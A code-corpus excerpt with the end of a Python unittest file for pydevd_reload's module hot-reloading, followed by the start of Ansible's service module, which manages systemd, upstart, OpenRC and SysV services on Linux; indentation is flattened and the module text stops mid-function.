return (0, 0, 0)
def unchanged(self):
return 'unchanged'
"""
class Test(unittest.TestCase):
def setUp(self):
unittest.TestCase.setUp(self)
self.tempdir = None
self.save_path = None
self.tempdir = tempfile.mkdtemp()
self.save_path = list(sys.path)
sys.path.append(self.tempdir)
try:
del sys.modules['x']
except:
pass
def tearDown(self):
unittest.TestCase.tearDown(self)
sys.path = self.save_path
try:
del sys.modules['x']
except:
pass
def make_mod(self, name="x", repl=None, subst=None, sample=SAMPLE_CODE):
fn = os.path.join(self.tempdir, name + ".py")
f = open(fn, "w")
if repl is not None and subst is not None:
sample = sample.replace(repl, subst)
try:
f.write(sample)
finally:
f.close()
def test_pydevd_reload(self):
self.make_mod()
import x
C = x.C
COut = C
Cfoo = C.foo
Cbar = C.bar
Cstomp = C.stomp
def check2(expected):
C = x.C
Cfoo = C.foo
Cbar = C.bar
Cstomp = C.stomp
b = C()
bfoo = b.foo
self.assertEqual(expected, b.foo())
self.assertEqual(expected, bfoo())
self.assertEqual(expected, Cfoo(b))
def check(expected):
b = COut()
bfoo = b.foo
self.assertEqual(expected, b.foo())
self.assertEqual(expected, bfoo())
self.assertEqual(expected, Cfoo(b))
self.assertEqual((expected, expected), Cbar())
self.assertEqual((expected, expected, expected), Cstomp())
check2(expected)
check(0)
# modify mod and reload
count = 0
while count < 1:
count += 1
self.make_mod(repl="0", subst=str(count))
pydevd_reload.xreload(x)
check(count)
def test_pydevd_reload2(self):
self.make_mod()
import x
c = x.C()
cfoo = c.foo
self.assertEqual(0, c.foo())
self.assertEqual(0, cfoo())
self.make_mod(repl="0", subst='1')
pydevd_reload.xreload(x)
self.assertEqual(1, c.foo())
self.assertEqual(1, cfoo())
def test_pydevd_reload3(self):
class F:
def m1(self):
return 1
class G:
def m1(self):
return 2
self.assertEqual(F().m1(), 1)
pydevd_reload.Reload(None)._update(None, None, F, G)
self.assertEqual(F().m1(), 2)
def test_pydevd_reload4(self):
class F:
pass
F.m1 = lambda a:None
class G:
pass
G.m1 = lambda a:10
self.assertEqual(F().m1(), None)
pydevd_reload.Reload(None)._update(None, None, F, G)
self.assertEqual(F().m1(), 10)
def test_if_code_obj_equals(self):
class F:
def m1(self):
return 1
class G:
def m1(self):
return 1
class H:
def m1(self):
return 2
if hasattr(F.m1, 'func_code'):
self.assertTrue(pydevd_reload.code_objects_equal(F.m1.func_code, G.m1.func_code))
self.assertFalse(pydevd_reload.code_objects_equal(F.m1.func_code, H.m1.func_code))
else:
self.assertTrue(pydevd_reload.code_objects_equal(F.m1.__code__, G.m1.__code__))
self.assertFalse(pydevd_reload.code_objects_equal(F.m1.__code__, H.m1.__code__))
def test_metaclass(self):
class Meta(type):
def __init__(cls, name, bases, attrs):
super(Meta, cls).__init__(name, bases, attrs)
class F:
__metaclass__ = Meta
def m1(self):
return 1
class G:
__metaclass__ = Meta
def m1(self):
return 2
self.assertEqual(F().m1(), 1)
pydevd_reload.Reload(None)._update(None, None, F, G)
self.assertEqual(F().m1(), 2)
def test_change_hierarchy(self):
class F(object):
def m1(self):
return 1
class B(object):
def super_call(self):
return 2
class G(B):
def m1(self):
return self.super_call()
self.assertEqual(F().m1(), 1)
old = pydevd_reload.notify_error
self._called = False
def on_error(*args):
self._called = True
try:
pydevd_reload.notify_error = on_error
pydevd_reload.Reload(None)._update(None, None, F, G)
self.assertTrue(self._called)
finally:
pydevd_reload.notify_error = old
def test_change_hierarchy_old_style(self):
class F:
def m1(self):
return 1
class B:
def super_call(self):
return 2
class G(B):
def m1(self):
return self.super_call()
self.assertEqual(F().m1(), 1)
old = pydevd_reload.notify_error
self._called = False
def on_error(*args):
self._called = True
try:
pydevd_reload.notify_error = on_error
pydevd_reload.Reload(None)._update(None, None, F, G)
self.assertTrue(self._called)
finally:
pydevd_reload.notify_error = old
def test_create_class(self):
SAMPLE_CODE1 = """
class C:
def foo(self):
return 0
"""
# Creating a new class and using it from old class
SAMPLE_CODE2 = """
class B:
pass
class C:
def foo(self):
return B
"""
self.make_mod(sample=SAMPLE_CODE1)
import x
foo = x.C().foo
self.assertEqual(foo(), 0)
self.make_mod(sample=SAMPLE_CODE2)
pydevd_reload.xreload(x)
self.assertEqual(foo().__name__, 'B')
def test_create_class2(self):
SAMPLE_CODE1 = """
class C(object):
def foo(self):
return 0
"""
# Creating a new class and using it from old class
SAMPLE_CODE2 = """
class B(object):
pass
class C(object):
def foo(self):
return B
"""
self.make_mod(sample=SAMPLE_CODE1)
import x
foo = x.C().foo
self.assertEqual(foo(), 0)
self.make_mod(sample=SAMPLE_CODE2)
pydevd_reload.xreload(x)
self.assertEqual(foo().__name__, 'B')
def test_parent_function(self):
SAMPLE_CODE1 = """
class B(object):
def foo(self):
return 0
class C(B):
def call(self):
return self.foo()
"""
# Creating a new class and using it from old class
SAMPLE_CODE2 = """
class B(object):
def foo(self):
return 0
def bar(self):
return 'bar'
class C(B):
def call(self):
return self.bar()
"""
self.make_mod(sample=SAMPLE_CODE1)
import x
call = x.C().call
self.assertEqual(call(), 0)
self.make_mod(sample=SAMPLE_CODE2)
pydevd_reload.xreload(x)
self.assertEqual(call(), 'bar')
def test_update_constant(self):
SAMPLE_CODE1 = """
CONSTANT = 1
class B(object):
def foo(self):
return CONSTANT
"""
SAMPLE_CODE2 = """
CONSTANT = 2
class B(object):
def foo(self):
return CONSTANT
"""
self.make_mod(sample=SAMPLE_CODE1)
import x
foo = x.B().foo
self.assertEqual(foo(), 1)
self.make_mod(sample=SAMPLE_CODE2)
pydevd_reload.xreload(x)
self.assertEqual(foo(), 1) #Just making it explicit we don't reload constants.
def test_update_constant_with_custom_code(self):
SAMPLE_CODE1 = """
CONSTANT = 1
class B(object):
def foo(self):
return CONSTANT
"""
SAMPLE_CODE2 = """
CONSTANT = 2
def __xreload_old_new__(namespace, name, old, new):
if name == 'CONSTANT':
namespace[name] = new
class B(object):
def foo(self):
return CONSTANT
"""
self.make_mod(sample=SAMPLE_CODE1)
import x
foo = x.B().foo
self.assertEqual(foo(), 1)
self.make_mod(sample=SAMPLE_CODE2)
pydevd_reload.xreload(x)
self.assertEqual(foo(), 2) #Actually updated it now!
def test_reload_custom_code_after_changes(self):
SAMPLE_CODE1 = """
CONSTANT = 1
class B(object):
def foo(self):
return CONSTANT
"""
SAMPLE_CODE2 = """
CONSTANT = 1
def __xreload_after_reload_update__(namespace):
namespace['CONSTANT'] = 2
class B(object):
def foo(self):
return CONSTANT
"""
self.make_mod(sample=SAMPLE_CODE1)
import x
foo = x.B().foo
self.assertEqual(foo(), 1)
self.make_mod(sample=SAMPLE_CODE2)
pydevd_reload.xreload(x)
self.assertEqual(foo(), 2) #Actually updated it now!
def test_reload_custom_code_after_changes_in_class(self):
SAMPLE_CODE1 = """
class B(object):
CONSTANT = 1
def foo(self):
return self.CONSTANT
"""
SAMPLE_CODE2 = """
class B(object):
CONSTANT = 1
@classmethod
def __xreload_after_reload_update__(cls):
cls.CONSTANT = 2
def foo(self):
return self.CONSTANT
"""
self.make_mod(sample=SAMPLE_CODE1)
import x
foo = x.B().foo
self.assertEqual(foo(), 1)
self.make_mod(sample=SAMPLE_CODE2)
pydevd_reload.xreload(x)
self.assertEqual(foo(), 2) #Actually updated it now!
    def test_update_class_constant_with_custom_code(self):
SAMPLE_CODE1 = """
class B(object):
CONSTANT = 1
def foo(self):
return self.CONSTANT
"""
SAMPLE_CODE2 = """
class B(object):
CONSTANT = 2
def __xreload_old_new__(cls, name, old, new):
if name == 'CONSTANT':
cls.CONSTANT = new
__xreload_old_new__ = classmethod(__xreload_old_new__)
def foo(self):
return self.CONSTANT
"""
self.make_mod(sample=SAMPLE_CODE1)
import x
foo = x.B().foo
self.assertEqual(foo(), 1)
self.make_mod(sample=SAMPLE_CODE2)
pydevd_reload.xreload(x)
self.assertEqual(foo(), 2) #Actually updated it now!
def test_update_with_slots(self):
SAMPLE_CODE1 = """
class B(object):
__slots__ = ['bar']
"""
SAMPLE_CODE2 = """
class B(object):
__slots__ = ['bar', 'foo']
def m1(self):
self.bar = 10
return 1
"""
self.make_mod(sample=SAMPLE_CODE1)
import x
B = x.B
self.make_mod(sample=SAMPLE_CODE2)
pydevd_reload.xreload(x)
b = B()
self.assertEqual(1, b.m1())
self.assertEqual(10, b.bar)
self.assertRaises(Exception, setattr, b, 'foo', 20) #__slots__ can't be updated
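# Taken together, the tests above exercise the three reload hooks that
# pydevd_reload honours: a module-level __xreload_old_new__(namespace, name,
# old, new), a per-class __xreload_old_new__(cls, name, old, new) classmethod,
# and __xreload_after_reload_update__, invoked once after the module or class
# has been patched.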
if __name__ == "__main__":
# import sys;sys.argv = ['', 'Test.test_reload_custom_code_after_changes_in_class']
unittest.main()
| epl-1.0 |
smiller171/ansible-modules-core | system/service.py | 8 | 57233 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2012, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: service
author:
- "Ansible Core Team"
- "Michael DeHaan"
version_added: "0.1"
short_description: Manage services.
description:
- Controls services on remote hosts. Supported init systems include BSD init,
OpenRC, SysV, Solaris SMF, systemd, upstart.
options:
name:
required: true
description:
- Name of the service.
state:
required: false
choices: [ started, stopped, restarted, reloaded ]
description:
- C(started)/C(stopped) are idempotent actions that will not run
commands unless necessary. C(restarted) will always bounce the
service. C(reloaded) will always reload. B(At least one of state
and enabled are required.)
sleep:
required: false
version_added: "1.3"
description:
- If the service is being C(restarted) then sleep this many seconds
between the stop and start command. This helps to workaround badly
behaving init scripts that exit immediately after signaling a process
to stop.
pattern:
required: false
version_added: "0.7"
description:
- If the service does not respond to the status command, name a
substring to look for as would be found in the output of the I(ps)
command as a stand-in for a status result. If the string is found,
the service will be assumed to be running.
enabled:
required: false
choices: [ "yes", "no" ]
description:
- Whether the service should start on boot. B(At least one of state and
enabled are required.)
runlevel:
required: false
default: 'default'
description:
- "For OpenRC init scripts (ex: Gentoo) only. The runlevel that this service belongs to."
arguments:
description:
- Additional arguments provided on the command line
aliases: [ 'args' ]
must_exist:
required: false
default: true
version_added: "2.0"
description:
- Avoid a module failure if the named service does not exist. Useful
for opportunistically starting/stopping/restarting a list of
potential services.
'''
EXAMPLES = '''
# Example action to start service httpd, if not running
- service: name=httpd state=started
# Example action to stop service httpd, if running
- service: name=httpd state=stopped
# Example action to restart service httpd, in all cases
- service: name=httpd state=restarted
# Example action to reload service httpd, in all cases
- service: name=httpd state=reloaded
# Example action to enable service httpd, and not touch the running state
- service: name=httpd enabled=yes
# Example action to start service foo, based on running process /usr/bin/foo
- service: name=foo pattern=/usr/bin/foo state=started
# Example action to restart network service for interface eth0
- service: name=network state=restarted args=eth0
# Example action to restart nova-compute if it exists
- service: name=nova-compute state=restarted must_exist=no
'''
import platform
import os
import re
import tempfile
import shlex
import select
import time
import string
import glob
# The distutils module is not shipped with SUNWPython on Solaris.
# It's in the SUNWPython-devel package which also contains development files
# that don't belong on production boxes. Since our Solaris code doesn't
# depend on LooseVersion, do not import it on Solaris.
if platform.system() != 'SunOS':
from distutils.version import LooseVersion
class Service(object):
"""
This is the generic Service manipulation class that is subclassed
based on platform.
A subclass should override the following action methods:-
- get_service_tools
- service_enable
- get_service_status
- service_control
All subclasses MUST define platform and distribution (which may be None).
"""
platform = 'Generic'
distribution = None
def __new__(cls, *args, **kwargs):
return load_platform_subclass(Service, args, kwargs)
def __init__(self, module):
self.module = module
self.name = module.params['name']
self.state = module.params['state']
self.sleep = module.params['sleep']
self.pattern = module.params['pattern']
self.enable = module.params['enabled']
self.runlevel = module.params['runlevel']
self.changed = False
self.running = None
self.crashed = None
self.action = None
self.svc_cmd = None
self.svc_initscript = None
self.svc_initctl = None
self.enable_cmd = None
self.arguments = module.params.get('arguments', '')
self.rcconf_file = None
self.rcconf_key = None
self.rcconf_value = None
self.svc_change = False
# select whether we dump additional debug info through syslog
self.syslogging = False
# ===========================================
# Platform specific methods (must be replaced by subclass).
def get_service_tools(self):
self.module.fail_json(msg="get_service_tools not implemented on target platform")
def service_enable(self):
self.module.fail_json(msg="service_enable not implemented on target platform")
def get_service_status(self):
self.module.fail_json(msg="get_service_status not implemented on target platform")
def service_control(self):
self.module.fail_json(msg="service_control not implemented on target platform")
# ===========================================
# Generic methods that should be used on all platforms.
def execute_command(self, cmd, daemonize=False):
if self.syslogging:
syslog.openlog('ansible-%s' % os.path.basename(__file__))
syslog.syslog(syslog.LOG_NOTICE, 'Command %s, daemonize %r' % (cmd, daemonize))
# Most things don't need to be daemonized
if not daemonize:
return self.module.run_command(cmd)
# This is complex because daemonization is hard for people.
# What we do is daemonize a part of this module, the daemon runs the
# command, picks up the return code and output, and returns it to the
# main process.
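# Example call (sketch; the init script path is hypothetical): daemonize an
# init-script restart and collect its result just like run_command() would:
#   rc, out, err = self.execute_command("/etc/init.d/foo restart", daemonize=True)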
pipe = os.pipe()
pid = os.fork()
if pid == 0:
os.close(pipe[0])
# Set stdin/stdout/stderr to /dev/null
fd = os.open(os.devnull, os.O_RDWR)
if fd != 0:
os.dup2(fd, 0)
if fd != 1:
os.dup2(fd, 1)
if fd != 2:
os.dup2(fd, 2)
if fd not in (0, 1, 2):
os.close(fd)
# Make us a daemon. Yes, that's all it takes.
pid = os.fork()
if pid > 0:
os._exit(0)
os.setsid()
os.chdir("/")
pid = os.fork()
if pid > 0:
os._exit(0)
# Start the command
if isinstance(cmd, basestring):
cmd = shlex.split(cmd)
p = subprocess.Popen(cmd, shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE, preexec_fn=lambda: os.close(pipe[1]))
stdout = ""
stderr = ""
fds = [p.stdout, p.stderr]
# Wait for all output, or until the main process is dead and its output is done.
while fds:
rfd, wfd, efd = select.select(fds, [], fds, 1)
if not (rfd + wfd + efd) and p.poll() is not None:
break
if p.stdout in rfd:
dat = os.read(p.stdout.fileno(), 4096)
if not dat:
fds.remove(p.stdout)
stdout += dat
if p.stderr in rfd:
dat = os.read(p.stderr.fileno(), 4096)
if not dat:
fds.remove(p.stderr)
stderr += dat
p.wait()
# Return a JSON blob to parent
os.write(pipe[1], json.dumps([p.returncode, stdout, stderr]))
os.close(pipe[1])
os._exit(0)
elif pid == -1:
self.module.fail_json(msg="unable to fork")
else:
os.close(pipe[1])
os.waitpid(pid, 0)
# Wait for data from daemon process and process it.
data = ""
while True:
rfd, wfd, efd = select.select([pipe[0]], [], [pipe[0]])
if pipe[0] in rfd:
dat = os.read(pipe[0], 4096)
if not dat:
break
data += dat
return json.loads(data)
def check_ps(self):
# Set ps flags
if platform.system() == 'SunOS':
psflags = '-ef'
else:
psflags = 'auxww'
# Find ps binary
psbin = self.module.get_bin_path('ps', True)
(rc, psout, pserr) = self.execute_command('%s %s' % (psbin, psflags))
# If rc is 0, set running as appropriate
if rc == 0:
self.running = False
lines = psout.split("\n")
for line in lines:
if self.pattern in line and "pattern=" not in line:
# so as to not confuse ./hacking/test-module
self.running = True
break
def check_service_changed(self):
if self.state and self.running is None:
self.module.fail_json(msg="failed determining service state, possible typo of service name?")
# Find out if state has changed
if not self.running and self.state in ["started", "running", "reloaded"]:
self.svc_change = True
elif self.running and self.state in ["stopped","reloaded"]:
self.svc_change = True
elif self.state == "restarted":
self.svc_change = True
if self.module.check_mode and self.svc_change:
self.module.exit_json(changed=True, msg='service state changed')
def modify_service_state(self):
# Only do something if state will change
if self.svc_change:
# Control service
if self.state in ['started', 'running']:
self.action = "start"
elif not self.running and self.state == 'reloaded':
self.action = "start"
elif self.state == 'stopped':
self.action = "stop"
elif self.state == 'reloaded':
self.action = "reload"
elif self.state == 'restarted':
self.action = "restart"
if self.module.check_mode:
self.module.exit_json(changed=True, msg='changing service state')
return self.service_control()
else:
# If nothing needs to change just say all is well
rc = 0
err = ''
out = ''
return rc, out, err
def service_enable_rcconf(self):
if self.rcconf_file is None or self.rcconf_key is None or self.rcconf_value is None:
self.module.fail_json(msg="service_enable_rcconf() requires rcconf_file, rcconf_key and rcconf_value")
self.changed = None
entry = '%s="%s"\n' % (self.rcconf_key, self.rcconf_value)
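# 'entry' now looks like e.g. sshd_enable="YES"; the key and value are
# supplied by the platform subclass (see the FreeBSD/NetBSD implementations)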
RCFILE = open(self.rcconf_file, "r")
new_rc_conf = []
# Build a list containing the possibly modified file.
for rcline in RCFILE:
# Parse line removing whitespaces, quotes, etc.
rcarray = shlex.split(rcline, comments=True)
if len(rcarray) >= 1 and '=' in rcarray[0]:
(key, value) = rcarray[0].split("=", 1)
if key == self.rcconf_key:
if value.upper() == self.rcconf_value:
# Since the proper entry already exists we can stop iterating.
self.changed = False
break
else:
# We found the key but the value is wrong, replace with new entry.
rcline = entry
self.changed = True
# Add line to the list.
new_rc_conf.append(rcline)
# We are done with reading the current rc.conf, close it.
RCFILE.close()
# If we did not see any trace of our entry we need to add it.
if self.changed is None:
new_rc_conf.append(entry)
self.changed = True
if self.changed is True:
if self.module.check_mode:
self.module.exit_json(changed=True, msg="changing service enablement")
# Create a temporary file next to the current rc.conf (so we stay on the same filesystem).
# This way the replacement operation is atomic.
rcconf_dir = os.path.dirname(self.rcconf_file)
rcconf_base = os.path.basename(self.rcconf_file)
(TMP_RCCONF, tmp_rcconf_file) = tempfile.mkstemp(dir=rcconf_dir, prefix="%s-" % rcconf_base)
# Write out the contents of the list into our temporary file.
for rcline in new_rc_conf:
os.write(TMP_RCCONF, rcline)
# Close temporary file.
os.close(TMP_RCCONF)
# Replace previous rc.conf.
self.module.atomic_move(tmp_rcconf_file, self.rcconf_file)
# ===========================================
# Subclass: Linux
class LinuxService(Service):
"""
This is the Linux Service manipulation class - it is currently supporting
a mixture of binaries and init scripts for controlling services started at
boot, as well as for controlling the current state.
"""
platform = 'Linux'
distribution = None
def get_service_tools(self):
paths = [ '/sbin', '/usr/sbin', '/bin', '/usr/bin' ]
binaries = [ 'service', 'chkconfig', 'update-rc.d', 'rc-service', 'rc-update', 'initctl', 'systemctl', 'start', 'stop', 'restart', 'insserv' ]
initpaths = [ '/etc/init.d' ]
location = dict()
for binary in binaries:
location[binary] = self.module.get_bin_path(binary)
for initdir in initpaths:
initscript = "%s/%s" % (initdir,self.name)
if os.path.isfile(initscript):
self.svc_initscript = initscript
def check_systemd():
# verify systemd is installed (by finding systemctl)
if not location.get('systemctl', False):
return False
# Check if init is the systemd command, using comm as cmdline could be symlink
try:
f = open('/proc/1/comm', 'r')
except IOError, err:
# If comm doesn't exist, old kernel, no systemd
return False
for line in f:
if 'systemd' in line:
return True
return False
# Locate a tool to enable/disable a service
if location.get('systemctl',False) and check_systemd():
# service is managed by systemd
self.__systemd_unit = self.name
self.svc_cmd = location['systemctl']
self.enable_cmd = location['systemctl']
elif location.get('initctl', False) and os.path.exists("/etc/init/%s.conf" % self.name):
# service is managed by upstart
self.enable_cmd = location['initctl']
# set the upstart version based on the output of 'initctl version'
self.upstart_version = LooseVersion('0.0.0')
try:
version_re = re.compile(r'\(upstart (.*)\)')
rc,stdout,stderr = self.module.run_command('initctl version')
if rc == 0:
res = version_re.search(stdout)
if res:
self.upstart_version = LooseVersion(res.groups()[0])
except:
pass # we'll use the default of 0.0.0
if location.get('start', False):
# upstart -- rather than being managed by one command, start/stop/restart are actual commands
self.svc_cmd = ''
elif location.get('rc-service', False):
# service is managed by OpenRC
self.svc_cmd = location['rc-service']
self.enable_cmd = location['rc-update']
return # already have service start/stop tool too!
elif self.svc_initscript:
# service is managed with SysV init scripts
if location.get('update-rc.d', False):
# and uses update-rc.d
self.enable_cmd = location['update-rc.d']
elif location.get('insserv', None):
# and uses insserv
self.enable_cmd = location['insserv']
elif location.get('chkconfig', False):
# and uses chkconfig
self.enable_cmd = location['chkconfig']
if self.enable_cmd is None:
if self.module.params['must_exist']:
self.module.fail_json(msg="no service or tool found for: %s" % self.name)
else:
# exiting without change on non-existent service
self.module.exit_json(changed=False, exists=False)
# If no service control tool selected yet, try to see if 'service' is available
if self.svc_cmd is None and location.get('service', False):
self.svc_cmd = location['service']
# couldn't find anything yet
if self.svc_cmd is None and not self.svc_initscript:
if self.module.params['must_exist']:
self.module.fail_json(msg='cannot find \'service\' binary or init script for service, possible typo in service name? Aborting.')
else:
# exiting without change on non-existent service
self.module.exit_json(changed=False, exists=False)
if location.get('initctl', False):
self.svc_initctl = location['initctl']
def get_systemd_service_enabled(self):
(rc, out, err) = self.execute_command("%s is-enabled %s" % (self.enable_cmd, self.__systemd_unit,))
if rc == 0:
return True
return False
def get_systemd_status_dict(self):
(rc, out, err) = self.execute_command("%s show %s" % (self.enable_cmd, self.__systemd_unit,))
if rc != 0:
self.module.fail_json(msg='failure %d running systemctl show for %r: %s' % (rc, self.__systemd_unit, err))
key = None
value_buffer = []
status_dict = {}
for line in out.splitlines():
if not key:
key, value = line.split('=', 1)
# systemd fields that are shell commands can be multi-line
# We take a value that begins with a "{" as the start of
# a shell command and a line that ends with "}" as the end of
# the command
if value.lstrip().startswith('{'):
if value.rstrip().endswith('}'):
status_dict[key] = value
key = None
else:
value_buffer.append(value)
else:
status_dict[key] = value
key = None
else:
if line.rstrip().endswith('}'):
status_dict[key] = '\n'.join(value_buffer)
key = None
# reset the buffer so the next multi-line value starts clean
value_buffer = []
else:
value_buffer.append(line)
return status_dict
def get_systemd_service_status(self):
d = self.get_systemd_status_dict()
if d.get('ActiveState') == 'active':
# run-once services (for which a single successful exit indicates
# that they are running as designed) should not be restarted here.
# Thus, we are not checking d['SubState'].
self.running = True
self.crashed = False
elif d.get('ActiveState') == 'failed':
self.running = False
self.crashed = True
elif d.get('ActiveState') is None:
self.module.fail_json(msg='No ActiveState value in systemctl show output for %r' % (self.__systemd_unit,))
else:
self.running = False
self.crashed = False
return self.running
def get_service_status(self):
if self.svc_cmd and self.svc_cmd.endswith('systemctl'):
return self.get_systemd_service_status()
self.action = "status"
rc, status_stdout, status_stderr = self.service_control()
# if we have decided the service is managed by upstart, we check for some additional output...
if self.svc_initctl and self.running is None:
# check the job status by upstart response
initctl_rc, initctl_status_stdout, initctl_status_stderr = self.execute_command("%s status %s" % (self.svc_initctl, self.name))
if "stop/waiting" in initctl_status_stdout:
self.running = False
elif "start/running" in initctl_status_stdout:
self.running = True
if self.svc_cmd and self.svc_cmd.endswith("rc-service") and self.running is None:
openrc_rc, openrc_status_stdout, openrc_status_stderr = self.execute_command("%s %s status" % (self.svc_cmd, self.name))
self.running = "started" in openrc_status_stdout
self.crashed = "crashed" in openrc_status_stderr
# if the job status is still not known check it by status output keywords
# Only check keywords if there's only one line of output (some init
# scripts will output verbosely in case of error, and those can emit
# keywords that are picked up as false positives).
if self.running is None and status_stdout.count('\n') <= 1:
# first transform the status output that could irritate keyword matching
cleanout = status_stdout.lower().replace(self.name.lower(), '')
if "stop" in cleanout:
self.running = False
elif "run" in cleanout and "not" in cleanout:
self.running = False
elif "run" in cleanout and "not" not in cleanout:
self.running = True
elif "start" in cleanout and "not" not in cleanout:
self.running = True
elif 'could not access pid file' in cleanout:
self.running = False
elif 'is dead and pid file exists' in cleanout:
self.running = False
elif 'dead but subsys locked' in cleanout:
self.running = False
elif 'dead but pid file exists' in cleanout:
self.running = False
# if the job status is still not known check it by response code
# For reference, see:
# http://refspecs.linuxbase.org/LSB_4.1.0/LSB-Core-generic/LSB-Core-generic/iniscrptact.html
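# For reference, the LSB status exit codes are: 0 = running; 1 = dead but
# pid file exists; 2 = dead but lock file exists; 3 = not running;
# 4 = status unknown. 69 is emitted by some non-conforming scripts.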
if self.running is None:
if rc in [1, 2, 3, 4, 69]:
self.running = False
elif rc == 0:
self.running = True
# if the job status is still not known check it by special conditions
if self.running is None:
if self.name == 'iptables' and "ACCEPT" in status_stdout:
# iptables status command output is lame
# TODO: lookup if we can use a return code for this instead?
self.running = True
return self.running
def service_enable(self):
if self.enable_cmd is None:
self.module.fail_json(msg='cannot detect command to enable service %s, typo or init system potentially unknown' % self.name)
self.changed = True
action = None
#
# Upstart's initctl
#
if self.enable_cmd.endswith("initctl"):
def write_to_override_file(file_name, file_contents, ):
override_file = open(file_name, 'w')
override_file.write(file_contents)
override_file.close()
initpath = '/etc/init'
if self.upstart_version >= LooseVersion('0.6.7'):
manreg = re.compile(r'^manual\s*$', re.M | re.I)
config_line = 'manual\n'
else:
manreg = re.compile(r'^start on manual\s*$', re.M | re.I)
config_line = 'start on manual\n'
conf_file_name = "%s/%s.conf" % (initpath, self.name)
override_file_name = "%s/%s.override" % (initpath, self.name)
# Check to see if files contain the manual line in .conf and fail if True
if manreg.search(open(conf_file_name).read()):
self.module.fail_json(msg="manual stanza not supported in a .conf file")
self.changed = False
if os.path.exists(override_file_name):
override_file_contents = open(override_file_name).read()
# Remove manual stanza if present and service enabled
if self.enable and manreg.search(override_file_contents):
self.changed = True
override_state = manreg.sub('', override_file_contents)
# Add manual stanza if not present and service disabled
elif not (self.enable) and not (manreg.search(override_file_contents)):
self.changed = True
override_state = '\n'.join((override_file_contents, config_line))
# service already in desired state
else:
pass
# Add file with manual stanza if service disabled
elif not (self.enable):
self.changed = True
override_state = config_line
else:
# service already in desired state
pass
if self.module.check_mode:
self.module.exit_json(changed=self.changed)
# The initctl method of enabling and disabling services is much
# different than for the other service methods. So actually
# committing the change is done in this conditional and then we
# skip the boilerplate at the bottom of the method
if self.changed:
try:
write_to_override_file(override_file_name, override_state)
except:
self.module.fail_json(msg='Could not modify override file')
return
#
# SysV's chkconfig
#
if self.enable_cmd.endswith("chkconfig"):
if self.enable:
action = 'on'
else:
action = 'off'
(rc, out, err) = self.execute_command("%s --list %s" % (self.enable_cmd, self.name))
if 'chkconfig --add %s' % self.name in err:
self.execute_command("%s --add %s" % (self.enable_cmd, self.name))
(rc, out, err) = self.execute_command("%s --list %s" % (self.enable_cmd, self.name))
if self.name not in out:
self.module.fail_json(msg="service %s does not support chkconfig" % self.name)
state = out.split()[-1]
# Check if we're already in the correct state
if "3:%s" % action in out and "5:%s" % action in out:
self.changed = False
return
#
# Systemd's systemctl
#
if self.enable_cmd.endswith("systemctl"):
if self.enable:
action = 'enable'
else:
action = 'disable'
# Check if we're already in the correct state
service_enabled = self.get_systemd_service_enabled()
# self.changed should already be true
if self.enable == service_enabled:
self.changed = False
return
#
# OpenRC's rc-update
#
if self.enable_cmd.endswith("rc-update"):
if self.enable:
action = 'add'
else:
action = 'delete'
(rc, out, err) = self.execute_command("%s show" % self.enable_cmd)
for line in out.splitlines():
service_name, runlevels = line.split('|')
service_name = service_name.strip()
if service_name != self.name:
continue
runlevels = re.split(r'\s+', runlevels)
# service already enabled for the runlevel
if self.enable and self.runlevel in runlevels:
self.changed = False
# service already disabled for the runlevel
elif not self.enable and self.runlevel not in runlevels:
self.changed = False
break
else:
# service already disabled altogether
if not self.enable:
self.changed = False
if not self.changed:
return
#
# update-rc.d style
#
if self.enable_cmd.endswith("update-rc.d"):
enabled = False
slinks = glob.glob('/etc/rc?.d/S??' + self.name)
if slinks:
enabled = True
if self.enable != enabled:
self.changed = True
if self.enable:
action = 'enable'
klinks = glob.glob('/etc/rc?.d/K??' + self.name)
if not klinks:
(rc, out, err) = self.execute_command("%s %s defaults" % (self.enable_cmd, self.name))
if rc != 0:
if err:
self.module.fail_json(msg=err)
else:
self.module.fail_json(msg=out)
else:
action = 'disable'
if self.module.check_mode:
rc = 0
return
(rc, out, err) = self.execute_command("%s %s %s" % (self.enable_cmd, self.name, action))
if rc != 0:
if err:
self.module.fail_json(msg=err)
else:
self.module.fail_json(msg=out)
else:
self.changed = False
return
#
# insserv (Debian 7)
#
if self.enable_cmd.endswith("insserv"):
if self.enable:
(rc, out, err) = self.execute_command("%s -n %s" % (self.enable_cmd, self.name))
else:
(rc, out, err) = self.execute_command("%s -nr %s" % (self.enable_cmd, self.name))
self.changed = False
for line in err.splitlines():
if self.enable and line.find('enable service') != -1:
self.changed = True
break
if not self.enable and line.find('remove service') != -1:
self.changed = True
break
if self.module.check_mode:
self.module.exit_json(changed=self.changed)
if not self.changed:
return
if self.enable:
(rc, out, err) = self.execute_command("%s %s" % (self.enable_cmd, self.name))
if (rc != 0) or (err != ''):
self.module.fail_json(msg=("Failed to install service. rc: %s, out: %s, err: %s" % (rc, out, err)))
return (rc, out, err)
else:
(rc, out, err) = self.execute_command("%s -r %s" % (self.enable_cmd, self.name))
if (rc != 0) or (err != ''):
self.module.fail_json(msg=("Failed to remove service. rc: %s, out: %s, err: %s" % (rc, out, err)))
return (rc, out, err)
#
# If we've gotten to the end, the service needs to be updated
#
self.changed = True
# we change argument order depending on real binary used:
# rc-update and systemctl need the argument order reversed
if self.enable_cmd.endswith("rc-update"):
args = (self.enable_cmd, action, self.name + " " + self.runlevel)
elif self.enable_cmd.endswith("systemctl"):
args = (self.enable_cmd, action, self.__systemd_unit)
else:
args = (self.enable_cmd, self.name, action)
if self.module.check_mode:
self.module.exit_json(changed=self.changed)
(rc, out, err) = self.execute_command("%s %s %s" % args)
if rc != 0:
if err:
self.module.fail_json(msg="Error when trying to %s %s: rc=%s %s" % (action, self.name, rc, err))
else:
self.module.fail_json(msg="Failure for %s %s: rc=%s %s" % (action, self.name, rc, out))
return (rc, out, err)
def service_control(self):
# Decide what command to run
svc_cmd = ''
arguments = self.arguments
if self.svc_cmd:
if not self.svc_cmd.endswith("systemctl"):
# SysV and OpenRC take the form <cmd> <name> <action>
